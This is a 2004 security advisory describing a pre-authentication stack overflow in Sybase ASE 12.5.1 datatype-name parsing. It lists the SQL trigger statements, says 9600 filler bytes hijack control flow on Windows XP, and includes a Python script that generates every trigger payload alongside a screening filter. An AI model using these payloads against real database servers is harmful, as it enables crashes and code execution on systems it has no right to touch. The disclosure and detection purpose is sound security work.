ASE 12.5.1 datatype overflow

NGSSoftware Insight Security Research Advisory


Name: Sybase ASE convert overflow

Systems Affected: Sybase Adaptive Server Enterprise 12.5.1 and lower

Severity: High

Vendor URL:

Author: Sherief Hammad [ ]

Date of Technical Advisory: 25th June 2004




There is an exploitable stack overflow in Sybase ASE's handling of user-supplied datatype names. Any SQL statement whose syntax defines a datatype for a variable, column, parameter or return value can reach the vulnerable code. The overflow is triggered while the statement is being parsed, before any permission check, so access to the affected statements cannot be restricted by privilege.


The bug can be observed by starting the Sybase server, attaching a debugger and then running the SQL statement:


declare @foo 'AAAA…..AAAA'


9600 A's is sufficient to cause the flow of control to be directed to the address 0x41414141 ('AAAA' in hex) on a Windows XP platform.


Other attack vectors that reach the same code are:


declare var1 'lotsofAs'


create table #foo (col1 'lotsofAs')


alter table master.dbo.sysobjects add col1 'lotsofAs'

NB: the overflow occurs before permissions are checked, so the caller does not need rights to alter the target table.

The same applies to the modify clause as well as add.



create function foo (var1 'lotsofAs') returns int language java parameter style java external name 'java.test'

create function foo (var1 int) returns 'lotsofAs' language java parameter style java external name 'java.test'

NB: the overflow occurs before permissions are checked.


create procedure foo @var1 'lotsofAs' as return 0

NB: the overflow occurs before permissions are checked.
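As an added illustration (not code from the advisory or from NGSSoftware), the Python below does two things with the statement shapes listed above, from the first declare example through the create procedure case: it reproduces each trigger statement with a filler of a chosen length in the datatype position, and, for the defensive side, screens a batch of SQL text for abnormally long datatype tokens in exactly those shapes. The 255-byte sanity bound, the label names and the sample benign statements are assumptions of the example; the 9600-byte figure is the one the advisory reports for Windows XP.

```python
import re

# Constructed figures: the advisory reports that 9600 bytes of filler redirect
# execution on Windows XP. The 255-byte ceiling for a datatype name is an
# assumed sanity bound for screening, not a figure from the advisory.
CRASH_LENGTH = 9600
MAX_TYPE_NAME = 255

# One pattern per statement shape listed in the advisory; each captures the
# quoted datatype token. Inputs are expected to use straight single quotes.
TYPE_TOKEN_PATTERNS = [
    # declare @foo 'type'  and  declare var1 'type'
    re.compile(r"^\s*declare\s+@?\w+\s+'([^']*)'", re.I),
    # create table #foo (col1 'type')
    re.compile(r"^\s*create\s+table\s+\S+\s*\(\s*\w+\s+'([^']*)'", re.I),
    # alter table master.dbo.sysobjects add|modify col1 'type'
    re.compile(r"^\s*alter\s+table\s+\S+\s+(?:add|modify)\s+\w+\s+'([^']*)'", re.I),
    # create function foo (var1 'type') returns int ...
    re.compile(r"^\s*create\s+function\s+\w+\s*\(\s*\w+\s+'([^']*)'", re.I),
    # create function foo (var1 int) returns 'type' ...
    re.compile(r"^\s*create\s+function\b.*?\breturns\s+'([^']*)'", re.I | re.S),
    # create procedure foo @var1 'type' as ...
    re.compile(r"^\s*create\s+proc(?:edure)?\s+\w+\s+@\w+\s+'([^']*)'", re.I),
]


def build_payloads(length=CRASH_LENGTH, filler="A"):
    """Reproduce every trigger statement from the advisory with a filler of
    the requested length in the datatype position. The dictionary keys are
    descriptive labels chosen for this example, not names from the advisory."""
    t = filler * length
    java = "language java parameter style java external name 'java.test'"
    return {
        "declare-variable": f"declare @foo '{t}'",
        "declare-bare": f"declare var1 '{t}'",
        "create-table": f"create table #foo (col1 '{t}')",
        "alter-table-add": f"alter table master.dbo.sysobjects add col1 '{t}'",
        "alter-table-modify": f"alter table master.dbo.sysobjects modify col1 '{t}'",
        "create-function-param": f"create function foo (var1 '{t}') returns int {java}",
        "create-function-return": f"create function foo (var1 int) returns '{t}' {java}",
        "create-procedure": f"create procedure foo @var1 '{t}' as return 0",
    }


def datatype_tokens(statement):
    """Return the datatype tokens found in a statement (empty list if none)."""
    found = []
    for pattern in TYPE_TOKEN_PATTERNS:
        match = pattern.search(statement)
        if match:
            found.append(match.group(1))
    return found


def is_suspicious(statement, limit=MAX_TYPE_NAME):
    """True when any datatype token exceeds the configured sanity bound."""
    return any(len(token) > limit for token in datatype_tokens(statement))


def screen(batch, limit=MAX_TYPE_NAME):
    """Screen a list of statements; return (index, longest token length)
    for each statement that should be blocked or alerted on."""
    hits = []
    for index, statement in enumerate(batch):
        lengths = [len(token) for token in datatype_tokens(statement)]
        if lengths and max(lengths) > limit:
            hits.append((index, max(lengths)))
    return hits


if __name__ == "__main__":
    # Constructed batch: two benign statements followed by all eight triggers.
    batch = ["declare @x 'int'", "select name from master.dbo.sysobjects"]
    batch += list(build_payloads().values())
    for index, longest in screen(batch):
        print(f"statement {index}: datatype token of {longest} bytes, blocking")
```

Because the server checks permissions only after the overflow has already happened, the screening half belongs in front of the server (a SQL proxy, or the application's own query validation), where it can reject a statement before it is ever parsed by ASE.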



Fix Information


The vendor has not yet confirmed the existence of the bug.


About NGSSoftware


NGSSoftware design, research and develop intelligent, advanced application security assessment scanners. Based in the United Kingdom, NGSSoftware have offices in the South of London and the East Coast of Scotland. NGSSoftware's sister company NGSConsulting offers best of breed security consulting services, specializing in application, host and network security.



Telephone +44 208 401 0070

Fax +44 208 401 0076

Call us before you need us.

Our experts will help you.
